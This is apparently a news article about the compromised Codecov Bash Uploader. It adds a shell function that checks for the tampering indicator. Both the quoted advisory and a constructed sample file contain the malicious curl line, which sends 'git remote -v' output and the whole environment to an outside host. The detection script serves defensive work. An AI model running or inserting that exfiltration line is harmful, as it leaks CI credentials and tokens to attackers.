The company's statement does not yet give all the technical details of the breach, but it is known that the attackers exploited a flaw in Codecov's Docker image creation process and, through it, were able to modify the Bash Uploader script. The tampered code was then delivered to customers, except those using a special version of the product without cloud functionality. The first modification took place back on January 31st. For at least 2.5 months, an effectively malicious script was distributed from Codecov's servers. The access keys to the affected customers' cloud development tools have very likely leaked.
Codecov clients are advised to check the installed version of the script for the following line:
curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://REDACTED/upload/v2 || true
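One way to perform that check across local copies of the uploader, as an added example that is not part of Codecov's advisory or tooling: the function below greps a given file for the distinctive fragment of the indicator line (the hostname is redacted in the public advisory, so the match is on the git/env fragment rather than the URL). The file paths and the two sample scripts are constructed here for a stand-alone run.

```shell
#!/bin/sh
# Added example, not Codecov's own code. Scans a file for the exfiltration
# indicator quoted in the advisory above.

# check_uploader FILE
#   returns 0 if FILE contains the indicator, 1 if it does not, 2 if unreadable.
check_uploader() {
    file="$1"
    [ -r "$file" ] || { echo "cannot read $file" >&2; return 2; }
    # Fixed-string match (-F) on the fragment that is stable across the
    # redacted advisory text; the upload host is not relied upon.
    if grep -qF 'git remote -v)<<<<<< ENV $(env)' "$file"; then
        echo "INDICATOR FOUND in $file"
        return 0
    fi
    echo "no indicator in $file"
    return 1
}

# Constructed sample files (assumed content, for demonstration only).
tmpdir=$(mktemp -d)
printf '#!/bin/bash\n# clean uploader\ncurl -X POST https://codecov.io/upload/v4\n' > "$tmpdir/clean.sh"
printf '#!/bin/bash\ncurl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://REDACTED/upload/v2 || true\n' > "$tmpdir/tampered.sh"

check_uploader "$tmpdir/clean.sh"
check_uploader "$tmpdir/tampered.sh"
```

A match means the script ran with access to the CI environment, so every credential that was present in `env` on that runner should be treated as exposed and rotated, which is the leak the article describes.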
The consequences of the breach are still hard to assess: this incident can be described as a supply-chain attack squared. A tool used by software developers was compromised, which means there is a chance that the code of Codecov's clients could also have been modified. Potential victims include major companies such as Atlassian, P&G and GoDaddy. In addition, the Bash Uploader code is open source, distributed under a free license and embedded in other projects for software developers.